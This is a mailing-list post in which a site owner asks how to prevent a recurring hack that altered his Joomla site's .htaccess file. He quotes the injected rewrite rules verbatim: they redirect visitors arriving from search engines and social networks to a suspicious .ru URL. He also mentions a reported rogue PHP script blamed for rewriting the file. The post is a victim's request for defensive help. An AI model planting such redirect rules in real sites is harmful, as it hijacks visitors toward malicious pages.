Hacked .htaccess redirect to htttp://reltime2012.ru/frunleh?9
Dear debianusers,
Does anyone knows how to protect against unauthorized change of .htaccess?
I googled the "htttp://reltime2012.ru/frunleh?9 redirect problem" and
found out that a lot of sites (mainly using wordpress) got hacked and
is redirected to a russian site.
One of my sites, that has joomla (and not wordpress) also got hacked (again).
In the beginning of the .htaccess one can read:
RewriteCond %{HTTP_REFERER}
^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*)
RewriteRule ^(.*)$ htttp://reltime2012.ru/frunleh?9 [R=301,L]
I find some tutorials on how to fix the problem,
http://newmediamike.com/2012/07/reltime-2012-frunleh-redirection/
http://wptrainingonline.com/
But none of them explains how to protect and prevent the problem to
happen again. This google's forum has a post stating that
http://productforums.google.com/forum/#!topic/webmasters/GsB423gsIlk
" the sysadmin told me that there was a php script entitled
"jos_jpxn.php" running that was rewriting my .htaccess" (lickface)
But I found no such script among my files.
(Of course, I changed my password, but I don't really think that is
the problem...)
I know it is easy to fix. I just wonder if I can prevent that to
happen again. I'm considering to simple put a "cron job" that rewrites
my .htaccess from time to time! :)
Anyone else saw this problem?
Thanks,
Beco
--
Dr. Beco
A.I. research, Cognitive Scientist and Philosopher
Linux Counter #201942
Reply to: